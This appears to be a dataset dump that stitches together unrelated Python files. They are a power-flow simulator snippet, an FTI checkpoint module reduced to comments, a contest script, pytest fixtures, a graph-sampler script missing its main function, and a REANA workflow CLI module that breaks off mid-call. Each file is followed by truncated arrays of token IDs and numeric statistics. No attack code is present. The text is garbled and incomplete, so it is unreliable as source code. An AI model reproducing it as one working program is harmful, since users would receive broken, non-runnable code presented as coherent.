Qrecv = simulator.get_line_data(line, 'D', 'QRECV_MVAR') # reactive power at receiving side
print(line, bus_send, (Psend, Qsend), bus_recv, (Precv, Qrecv))
# if you want to get the power of each transformer, you can try the following codes
transformers = simulator.get_transformers_at_bus(0) # 0 indicate all transformers will be returned
for transformer in transformers:
bus_pri = simulator.get_transformer_data(transformer, 'I', 'Primary', 'BUS') # get the bus number of primary side
bus_sec = simulator.get_transformer_data(transformer, 'I', 'Secondary', 'BUS') # get the bus number of secondary side
P_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'P_MW') # active power at primary side
Q_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'Q_MVAR') # reactive power at primary side
P_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'P_MW') # active power at secondary side
Q_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'Q_MVAR') # reactive power at secondary side
print(transformer, bus_pri, (P_pri, Q_pri), bus_sec, (P_sec, Q_sec))
# if you want to change generation of each generaor, trye the following codes
generator = (2,'1') # generator bus, and generator ID, check generator line of raw file
simulator.set_generator_data(generator, 'D', 'PGEN_MW', 50.0) # remember, only P of generator at bus of type 2 can be changed
data_type = 'I'
data_name = 'MAX ITERATION'
value = 10
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR')
newfile = "IEEE9.new.raw"
file_type = "PSS/E"
export_mode = 0 # keep as original
export_mode = 1 # order with bus number
export_mode = 2 # order with bus name
export_mode = 3 # order for dynamic simulation
simulator.save_powerflow_data(newfile, file_type, export_mode)
simulator.build_network_Y_matrix()
simulator.save_network_Y_matrix('ymatrix_pf.csv')
simulator.build_decoupled_network_B_matrix()
simulator.save_decoupled_network_B_matrix('bmatrix_pf.csv')
simulator.build_dc_network_B_matrix()
simulator.save_dc_network_B_matrix('bmatrix_dc_pf.csv')
simulator.build_network_Z_matrix()
simulator.save_network_Z_matrix('zmatrix_pf.csv') | [
2,
66,
7656,
796,
3384,
69,
12,
23,
198,
7061,
6,
198,
4342,
318,
257,
13605,
286,
4478,
703,
284,
1017,
659,
1176,
11125,
351,
2239,
2777,
88,
13,
198,
1925,
648,
28284,
7455,
11,
13130,
14,
2919,
14,
1495,
198,
7061,
6,
198,
1... | 2.987371 | 3,009 |
# This module initiates the checkpoint
# processing of FTI files.
import os
import glob
import os.path
import time
from fnmatch import fnmatch
import configparser
import posix_read_ckpts
import subprocess
import sys
# variables used for input validation
fti_levels = (1, 2, 3, 4)
output_formats = ('CSV', 'HDF5', 'data')
# runtime variables of FTI (ckpt and meta)
config_file = ""
ckpt_dir = ""
meta_dir = ""
global_dir = ""
group_size = 0
nbHeads = 0
nodeSize = 0
totalRanks = 0
ioMode = 0
ckpt_abs_path = ""
meta_abs_path = ""
execution_id = ""
level_meta_dir = ""
level_dir = ""
# This function reads the config_file
# and sets FTI parameters
# This function processes FTI's files
# given config_file and set the absolute
# paths of meta files and ckpt files
# This function returns the path of the
# ckpt corresponding to rank_id
# This function is called if io=2 and level=4
# it recovers the file from l4 directory in mpiio format
# to tmp/file in posix format
# This function returns the path of the
# meta corresponding to the ckpt_file
# note: for now it works with level 1
# This function sets FTI's files paths
# depending on the level where the ckpt is stored
# This function compares ckpt directories
# and returns the level to which the last ckpt was stored
# API to read the checkpoints given config and rank
# def read_checkpoints(config_file, rank_id, level=None, output=None):
| [
2,
770,
8265,
5383,
689,
262,
26954,
198,
2,
7587,
286,
19446,
40,
3696,
13,
220,
198,
198,
11748,
28686,
198,
11748,
15095,
198,
11748,
28686,
13,
6978,
198,
11748,
640,
198,
6738,
24714,
15699,
1330,
24714,
15699,
198,
11748,
4566,
... | 3.285383 | 431 |
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for weekly per project aggregation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains tests for weekly per project aggregation of
aggregator.projectcounts.
"""
import aggregator
import testcases
import os
import datetime
class WeeklyProjectAggregationTestCase(testcases.ProjectcountsDataTestCase):
"""TestCase for 'weekly' project aggregation functions"""
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
... | 3.943089 | 246 |
while True:
try:
n = int(input())
m,l = map(int, input().split(' '))
m_dic = {}
l_dic = {}
for i in range(1, m+1):
m_dic[i] = list(map(int, input().split(' ')))
for i in range(1, l+1):
l_dic[i] = list(map(int, input().split(' ')))
cm, cl = map(int, input().split(' '))
a = int(input())
m = m_dic[cm][a-1]
l = l_dic[cl][a-1]
if m > l:
print('Marcos')
elif l > m:
print('Leonardo')
else:
print('Empate')
except EOFError:
break | [
4514,
6407,
25,
198,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
299,
796,
493,
7,
15414,
28955,
198,
220,
220,
220,
220,
220,
220,
220,
285,
11,
75,
796,
3975,
7,
600,
11,
5128,
22446,
35312,
10786,
705,
40... | 1.688889 | 360 |
import pytest
from linked_list import LinkedList as LL
@pytest.fixture
def empty_ll():
"""fixture for empty array"""
return LL()
@pytest.fixture
def small_ll():
"""fixture for short array"""
return LL([1, 2, 3, 4])
@pytest.fixture
def short_ll():
"""fixture for short array"""
return LL([5, 6, 7, 8])
@pytest.fixture
def long_ll():
"""fixture for long array"""
return LL([11, 12, 13, 14, 15, 16])
| [
11748,
12972,
9288,
198,
6738,
6692,
62,
4868,
1330,
7502,
276,
8053,
355,
27140,
628,
198,
31,
9078,
9288,
13,
69,
9602,
198,
4299,
6565,
62,
297,
33529,
198,
220,
220,
220,
37227,
69,
9602,
329,
6565,
7177,
37811,
198,
220,
220,
2... | 2.555556 | 171 |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python
r"""Reject graphs based on importance to produce a uniform sample set.
Usage:
prefix=3_COFH
./reject_to_uniform.py \
--in_file=weighted/${prefix}.graphml \
--out_file=uniform/${prefix}.graphml
"""
from absl import app
from absl import flags
from graph_sampler import graph_io
from graph_sampler import molecule_sampler
FLAGS = flags.FLAGS
flags.DEFINE_string('in_file', None, 'Input file path.')
flags.DEFINE_string('out_file', None, 'Output file path.')
flags.DEFINE_string('seed', None, 'Seed used for random number generation.')
if __name__ == '__main__':
flags.mark_flags_as_required(['in_file', 'out_file'])
app.run(main)
| [
2,
19617,
28,
40477,
12,
23,
198,
2,
15069,
33160,
383,
3012,
4992,
46665,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
... | 3.230964 | 394 |
# -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2017, 2018 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""REANA client workflow related commands."""
import json
import logging
import os
import sys
import time
import traceback
import click
from jsonschema.exceptions import ValidationError
from reana_commons.config import INTERACTIVE_SESSION_TYPES, REANA_COMPUTE_BACKENDS
from reana_commons.errors import REANAValidationError
from reana_commons.operational_options import validate_operational_options
from reana_commons.utils import click_table_printer
from reana_client.cli.files import get_files, upload_files
from reana_client.cli.utils import (
add_access_token_options,
add_pagination_options,
add_workflow_option,
check_connection,
format_data,
format_session_uri,
human_readable_or_raw_option,
key_value_to_dict,
parse_filter_parameters,
parse_format_parameters,
requires_environments,
validate_workflow_name,
get_formatted_progress,
)
from reana_client.config import ERROR_MESSAGES, RUN_STATUSES, TIMECHECK
from reana_client.printer import display_message
from reana_client.utils import (
get_reana_yaml_file_path,
get_workflow_name_and_run_number,
get_workflow_status_change_msg,
is_uuid_v4,
load_reana_spec,
validate_input_parameters,
workflow_uuid_or_name,
)
@click.group(help="Workflow management commands")
@click.pass_context
def workflow_management_group(ctx):
"""Top level wrapper for workflow management."""
logging.debug(ctx.info_name)
@click.group(help="Workflow execution commands")
@click.pass_context
def workflow_execution_group(ctx):
"""Top level wrapper for execution related interaction."""
logging.debug(ctx.info_name)
@workflow_management_group.command("list")
@click.option(
"-s", "--sessions", is_flag=True, help="List all open interactive sessions."
)
@click.option(
"--format",
"_format",
multiple=True,
help="Format output according to column titles or column values. "
"Use `<columm_name>=<column_value>` format. "
"E.g. display workflow with failed status and named test_workflow "
"`--format status=failed,name=test_workflow`.",
)
@click.option(
"--json",
"output_format",
flag_value="json",
default=None,
help="Get output in JSON format.",
)
@click.option(
"--all",
"show_all",
count=True,
default=True,
help="Show all workflows including deleted ones.",
)
@click.option(
"-v",
"--verbose",
count=True,
help="Print out extra information: workflow id, user id, disk usage.",
)
@human_readable_or_raw_option
@click.option(
"--sort",
"sort_columm_name",
default="CREATED",
help="Sort the output by specified column",
)
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter workflow that contains certain filtering criteria. "
"Use `--filter <columm_name>=<column_value>` pairs. "
"Available filters are `name` and `status`.",
)
@click.option(
"--include-progress",
"include_progress",
is_flag=True,
default=None,
help="Include progress information of the workflows.",
)
@click.option(
"--include-workspace-size",
"include_workspace_size",
is_flag=True,
default=None,
help="Include size information of the workspace.",
)
@add_access_token_options
@add_pagination_options
@check_connection
@click.pass_context
def workflow_workflows( # noqa: C901
ctx,
sessions,
_format,
output_format,
access_token,
show_all,
verbose,
human_readable_or_raw,
sort_columm_name,
page,
size,
filters,
include_progress,
include_workspace_size,
): # noqa: D301
"""List all workflows and sessions.
The `list` command lists workflows and sessions. By default, the list of
workflows is returned. If you would like to see the list of your open
interactive sessions, you need to pass the `--sessions` command-line
option.
Example: \n
\t $ reana-client list --all \n
\t $ reana-client list --sessions \n
\t $ reana-client list --verbose --bytes
"""
import tablib
from reana_client.api.client import get_workflows
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
type = "interactive" if sessions else "batch"
status_filter = None
search_filter = None
if filters:
filter_names = ["name", "status"]
status_filter, search_filter = parse_filter_parameters(filters, filter_names)
if _format:
parsed_format_filters = parse_format_parameters(_format)
try:
response = get_workflows(
access_token,
type,
verbose=bool(verbose),
page=page,
size=size,
status=status_filter,
search=search_filter,
include_progress=include_progress,
include_workspace_size=include_workspace_size,
)
verbose_headers = ["id", "user"]
workspace_size_header = ["size"]
progress_header = ["progress"]
headers = {
"batch": ["name", "run_number", "created", "started", "ended", "status"],
"interactive": [
"name",
"run_number",
"created",
"session_type",
"session_uri",
"session_status",
],
}
if verbose:
headers[type] += verbose_headers
if verbose or include_workspace_size:
headers[type] += workspace_size_header
if verbose or include_progress:
headers[type] += progress_header
data = []
for workflow in response:
workflow["size"] = workflow["size"][human_readable_or_raw]
if workflow["status"] == "deleted" and not show_all:
continue
name, run_number = get_workflow_name_and_run_number(workflow["name"])
workflow["name"] = name
workflow["run_number"] = run_number
if type == "interactive":
workflow["session_uri"] = format_session_uri(
reana_server_url=ctx.obj.reana_server_url,
path=workflow["session_uri"],
access_token=access_token,
)
row = []
for header in headers[type]:
value = None
if header in progress_header:
value = get_formatted_progress(workflow.get("progress"))
elif header in ["started", "ended"]:
_key = (
"run_started_at" if header == "started" else "run_finished_at"
)
value = workflow.get("progress", {}).get(_key) or "-"
if not value:
value = workflow.get(header)
row.append(value)
data.append(row)
sort_column_id = 2
if sort_columm_name.lower() in headers[type]:
sort_column_id = headers[type].index(sort_columm_name.lower())
data = sorted(data, key=lambda x: x[sort_column_id], reverse=True)
workflow_ids = ["{0}.{1}".format(w[0], w[1]) for w in data]
if os.getenv("REANA_WORKON", "") in workflow_ids:
active_workflow_idx = workflow_ids.index(os.getenv("REANA_WORKON", ""))
for idx, row in enumerate(data):
if idx == active_workflow_idx:
run_number = str(data[idx][headers[type].index("run_number")])
run_number += " *"
tablib_data = tablib.Dataset()
tablib_data.headers = headers[type]
for row in data:
tablib_data.append(row=row, tags=row)
if _format:
tablib_data, filtered_headers = format_data(
parsed_format_filters, headers[type], tablib_data
)
if output_format:
click.echo(json.dumps(tablib_data))
else:
tablib_data = [list(item.values()) for item in tablib_data]
click_table_printer(filtered_headers, filtered_headers, tablib_data)
else:
if output_format:
click.echo(tablib_data.export(output_format))
else:
click_table_printer(headers[type], _format, data)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Workflow list could not be retrieved: \n{}".format(str(e)), fg="red"
),
err=True,
)
@workflow_management_group.command("create")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"-n",
"--name",
"-w",
"--workflow",
default="",
callback=validate_workflow_name,
help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
"--skip-validation",
is_flag=True,
help="If set, specifications file is not validated before "
"submitting it's contents to REANA server.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_create(ctx, file, name, skip_validation, access_token): # noqa: D301
"""Create a new workflow.
The `create` command allows to create a new workflow from reana.yaml
specifications file. The file is expected to be located in the current
working directory, or supplied via command-line -f option, see examples
below.
Examples: \n
\t $ reana-client create\n
\t $ reana-client create -w myanalysis\n
\t $ reana-client create -w myanalysis -f myreana.yaml\n
"""
from reana_client.api.client import create_workflow
from reana_client.utils import get_api_url
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
# Check that name is not an UUIDv4.
# Otherwise it would mess up `--workflow` flag usage because no distinction
# could be made between the name and actual UUID of workflow.
if is_uuid_v4(name):
display_message("Workflow name cannot be a valid UUIDv4", msg_type="error")
try:
reana_specification = load_reana_spec(
click.format_filename(file), skip_validation
)
logging.info("Connecting to {0}".format(get_api_url()))
response = create_workflow(reana_specification, name, access_token)
click.echo(click.style(response["workflow_name"], fg="green"))
# check if command is called from wrapper command
if "invoked_by_subcommand" in ctx.parent.__dict__:
ctx.parent.workflow_name = response["workflow_name"]
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Cannot create workflow {}: \n{}".format(name, str(e)), msg_type="error"
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("start")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off. (workflow engine - serial) "
"E.g. --debug (workflow engine - cwl)",
)
@click.option(
"--follow",
"follow",
is_flag=True,
default=False,
help="If set, follows the execution of the workflow until termination.",
)
@click.pass_context
def workflow_start(
ctx, workflow, access_token, parameters, options, follow
): # noqa: D301
"""Start previously created workflow.
The `start` command allows to start previously created workflow. The
workflow execution can be further influenced by passing input prameters
using `-p` or `--parameters` flag and by setting additional operational
options using `-o` or `--options`. The input parameters and operational
options can be repetitive. For example, to disable caching for the Serial
workflow engine, you can set `-o CACHE=off`.
Examples: \n
\t $ reana-client start -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
\t $ reana-client start -w myanalysis.42 -p myparam1=myvalue1 -o CACHE=off
"""
from reana_client.utils import get_api_url
from reana_client.api.client import (
get_workflow_parameters,
get_workflow_status,
start_workflow,
)
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
parsed_parameters = {"input_parameters": parameters, "operational_options": options}
if workflow:
if parameters or options:
try:
response = get_workflow_parameters(workflow, access_token)
workflow_type = response["type"]
original_parameters = response["parameters"]
validate_operational_options(
workflow_type, parsed_parameters["operational_options"]
)
parsed_parameters["input_parameters"] = validate_input_parameters(
parsed_parameters["input_parameters"], original_parameters
)
except REANAValidationError as e:
click.secho(e.message, err=True, fg="red")
sys.exit(1)
except Exception as e:
click.secho(
"Could not apply given input parameters: "
"{0} \n{1}".format(parameters, str(e)),
err=True,
)
try:
logging.info("Connecting to {0}".format(get_api_url()))
response = start_workflow(workflow, access_token, parsed_parameters)
current_status = get_workflow_status(workflow, access_token).get("status")
click.secho(
get_workflow_status_change_msg(workflow, current_status), fg="green"
)
if follow:
while "running" in current_status:
time.sleep(TIMECHECK)
current_status = get_workflow_status(workflow, access_token).get(
"status"
)
click.secho(
get_workflow_status_change_msg(workflow, current_status),
fg="green",
)
if "finished" in current_status:
if follow:
click.secho(
"[INFO] Listing workflow output " "files...", bold=True
)
ctx.invoke(
get_files,
workflow=workflow,
access_token=access_token,
output_format="url",
)
sys.exit(0)
elif "failed" in current_status or "stopped" in current_status:
sys.exit(1)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("restart")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off. (workflow engine - serial) "
"E.g. --debug (workflow engine - cwl)",
)
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.pass_context
def workflow_restart(
ctx, workflow, access_token, parameters, options, file
): # noqa: D301
"""Restart previously run workflow.
The `restart` command allows to restart a previous workflow on the same
workspace.
Note that workflow restarting can be used in a combination with operational
options ``FROM`` and ``TARGET``. You can also pass a modified workflow
specification with ``-f`` or `--file`` flag.
You can furthermore use modified input prameters using `-p` or
`--parameters` flag and by setting additional operational options using
`-o` or `--options`. The input parameters and operational options can be
repetitive.
Examples: \n
\t $ reana-client restart -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
\t $ reana-client restart -w myanalysis.42 -p myparam=myvalue\n
\t $ reana-client restart -w myanalysis.42 -o TARGET=gendata\n
\t $ reana-client restart -w myanalysis.42 -o FROM=fitdata
"""
from reana_client.utils import get_api_url
from reana_client.api.client import (
get_workflow_parameters,
get_workflow_status,
start_workflow,
)
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
parsed_parameters = {
"input_parameters": parameters,
"operational_options": options,
"restart": True,
}
if file:
parsed_parameters["reana_specification"] = load_reana_spec(
click.format_filename(file)
)
if workflow:
if parameters or options:
try:
if "reana_specification" in parsed_parameters:
workflow_type = parsed_parameters["reana_specification"][
"workflow"
]["type"]
original_parameters = (
parsed_parameters["reana_specification"]
.get("inputs", {})
.get("parameters", {})
)
else:
response = get_workflow_parameters(workflow, access_token)
workflow_type = response["type"]
original_parameters = response["parameters"]
parsed_parameters["operational_options"] = validate_operational_options(
workflow_type, parsed_parameters["operational_options"]
)
parsed_parameters["input_parameters"] = validate_input_parameters(
parsed_parameters["input_parameters"], original_parameters
)
except REANAValidationError as e:
click.secho(e.message, err=True, fg="red")
sys.exit(1)
except Exception as e:
click.secho(
"Could not apply given input parameters: "
"{0} \n{1}".format(parameters, str(e)),
err=True,
)
try:
logging.info("Connecting to {0}".format(get_api_url()))
response = start_workflow(workflow, access_token, parsed_parameters)
workflow = response["workflow_name"] + "." + str(response["run_number"])
current_status = get_workflow_status(workflow, access_token).get("status")
click.secho(
get_workflow_status_change_msg(workflow, current_status), fg="green"
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("status")
@add_workflow_option
@click.option(
"--format",
"_format",
multiple=True,
help="Format output by displaying only certain columns. "
"E.g. --format name,status.",
)
@click.option(
"--json",
"output_format",
flag_value="json",
default=None,
help="Get output in JSON format.",
)
@add_access_token_options
@check_connection
@click.option("-v", "--verbose", count=True, help="Set status information verbosity.")
@click.pass_context
def workflow_status( # noqa: C901
ctx, workflow, _format, output_format, access_token, verbose
): # noqa: D301
"""Get status of a workflow.
The `status` command allow to retrieve status of a workflow. The status can
be created, queued, running, failed, etc. You can increase verbosity or
filter retrieved information by passing appropriate command-line options.
Examples: \n
\t $ reana-client status -w myanalysis.42 \n
\t $ reana-client status -w myanalysis.42 -v --json
"""
import tablib
from reana_client.api.client import get_workflow_status
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
try:
if _format:
parsed_filters = parse_format_parameters(_format)
_format = [item["column_name"] for item in parsed_filters]
response = get_workflow_status(workflow, access_token)
headers = ["name", "run_number", "created", "status"]
verbose_headers = ["id", "user", "command"]
data = []
if not isinstance(response, list):
response = [response]
for workflow in response:
add_data_from_reponse(workflow, data, headers)
if verbose:
headers += verbose_headers
add_verbose_data_from_response(
workflow, verbose_headers, headers, data
)
if output_format:
tablib_data = tablib.Dataset()
tablib_data.headers = headers
for row in data:
tablib_data.append(row)
if _format:
tablib_data = tablib_data.subset(rows=None, cols=list(_format))
click.echo(tablib_data.export(output_format))
else:
click_table_printer(headers, _format, data)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot retrieve the status of a workflow {}: \n{}".format(
workflow, str(e)
),
fg="red",
),
err=True,
)
@workflow_execution_group.command("logs")
@add_workflow_option
@click.option("--json", "json_format", count=True, help="Get output in JSON format.")
@add_access_token_options
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter job logs to include only those steps that match certain filtering criteria. Use --filter name=value pairs. Available filters are compute_backend, docker_img, status and step.",
)
@add_pagination_options
@check_connection
@click.pass_context
def workflow_logs(
ctx,
workflow,
access_token,
json_format,
steps=None,
filters=None,
page=None,
size=None,
): # noqa: D301
"""Get workflow logs.
The `logs` command allows to retrieve logs of running workflow. Note that
only finished steps of the workflow are returned, the logs of the currently
processed step is not returned until it is finished.
Examples: \n
\t $ reana-client logs -w myanalysis.42
\t $ reana-client logs -w myanalysis.42 -s 1st_step
"""
from reana_client.api.client import get_workflow_logs
available_filters = {
"step": "job_name",
"compute_backend": "compute_backend",
"docker_img": "docker_img",
"status": "status",
}
steps = []
chosen_filters = dict()
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
if filters:
try:
for f in filters:
key, value = f.split("=")
if key not in available_filters:
click.echo(
click.style(
"Error: filter '{}' is not valid.\nAvailable filters are '{}'.".format(
key, "' '".join(sorted(available_filters.keys())),
),
fg="red",
),
err=True,
)
sys.exit(1)
elif key == "step":
steps.append(value)
else:
# Case insensitive for compute backends
if (
key == "compute_backend"
and value.lower() in REANA_COMPUTE_BACKENDS
):
value = REANA_COMPUTE_BACKENDS[value.lower()]
elif key == "status" and value not in RUN_STATUSES:
click.secho(
"==> ERROR: Input status value {} is not valid. ".format(
value
),
err=True,
fg="red",
),
sys.exit(1)
chosen_filters[key] = value
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Error: please provide complete --filter name=value pairs, for example --filter status=running.\nAvailable filters are '{}'.".format(
"' '".join(sorted(available_filters.keys()))
),
fg="red",
),
err=True,
)
sys.exit(1)
try:
response = get_workflow_logs(
workflow,
access_token,
steps=None if not steps else list(set(steps)),
page=page,
size=size,
)
workflow_logs = json.loads(response["logs"])
if filters:
for key, value in chosen_filters.items():
unwanted_steps = [
k
for k, v in workflow_logs["job_logs"].items()
if v[available_filters[key]] != value
]
for job_id in unwanted_steps:
del workflow_logs["job_logs"][job_id]
if json_format:
click.echo(json.dumps(workflow_logs, indent=2))
sys.exit(0)
else:
from reana_client.cli.utils import output_user_friendly_logs
output_user_friendly_logs(
workflow_logs, None if not steps else list(set(steps))
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot retrieve the logs of a workflow {}: \n{}".format(
workflow, str(e)
),
fg="red",
),
err=True,
)
@workflow_execution_group.command("validate")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"--environments",
is_flag=True,
default=False,
help="If set, check all runtime environments specified in REANA "
"specification file. [default=False]",
)
@click.option(
"--pull",
is_flag=True,
default=False,
callback=requires_environments,
help="If set, try to pull remote environment image from registry to perform "
"validation locally. Requires ``--environments`` flag. [default=False]",
)
@click.pass_context
def workflow_validate(ctx, file, environments, pull): # noqa: D301
"""Validate workflow specification file.
The `validate` command allows to check syntax and validate the reana.yaml
workflow specification file.
Examples: \n
\t $ reana-client validate -f reana.yaml
"""
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
try:
load_reana_spec(
click.format_filename(file),
skip_validate_environments=not environments,
pull_environment_image=pull,
)
except (ValidationError, REANAValidationError) as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"{0} is not a valid REANA specification:\n{1}".format(
click.format_filename(file), e.message
),
msg_type="error",
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong when trying to validate {}".format(file),
msg_type="error",
)
@workflow_execution_group.command("stop")
@click.option(
"--force",
"force_stop",
is_flag=True,
default=False,
help="Stop a workflow without waiting for jobs to finish.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_stop(ctx, workflow, force_stop, access_token): # noqa: D301
"""Stop a running workflow.
The `stop` command allows to hard-stop the running workflow process. Note
that soft-stopping of the workflow is currently not supported. This command
should be therefore used with care, only if you are absolutely sure that
there is no point in continuing the running the workflow.
Example: \n
\t $ reana-client stop -w myanalysis.42 --force
"""
from reana_client.api.client import get_workflow_status, stop_workflow
if not force_stop:
click.secho(
"Graceful stop not implement yet. If you really want to "
"stop your workflow without waiting for jobs to finish"
" use: --force option",
fg="red",
)
raise click.Abort()
if workflow:
try:
logging.info("Sending a request to stop workflow {}".format(workflow))
stop_workflow(workflow, force_stop, access_token)
click.secho(get_workflow_status_change_msg(workflow, "stopped"), fg="green")
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Cannot stop workflow {}: \n{}".format(workflow, str(e)),
fg="red",
err=True,
)
@workflow_execution_group.command("run")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"-n",
"--name",
"-w",
"--workflow",
default="",
callback=validate_workflow_name,
help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
"--skip-validation",
is_flag=True,
help="If set, specifications file is not validated before "
"submitting it's contents to REANA server.",
)
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off.",
)
@click.option(
"--follow",
"follow",
is_flag=True,
default=False,
help="If set, follows the execution of the workflow until termination.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_run(
ctx, file, name, skip_validation, access_token, parameters, options, follow
): # noqa: D301
"""Shortcut to create, upload, start a new workflow.
The `run` command allows to create a new workflow, upload its input files
and start it in one command.
Examples: \n
\t $ reana-client run -w myanalysis-test-small -p myparam=mysmallvalue \n
\t $ reana-client run -w myanalysis-test-big -p myparam=mybigvalue
"""
# set context parameters for subcommand
ctx.invoked_by_subcommand = True
ctx.workflow_name = ""
click.secho("[INFO] Creating a workflow...", bold=True)
ctx.invoke(
workflow_create,
file=file,
name=name,
skip_validation=skip_validation,
access_token=access_token,
)
click.secho("[INFO] Uploading files...", bold=True)
ctx.invoke(
upload_files,
workflow=ctx.workflow_name,
filenames=None,
access_token=access_token,
)
click.secho("[INFO] Starting workflow...", bold=True)
ctx.invoke(
workflow_start,
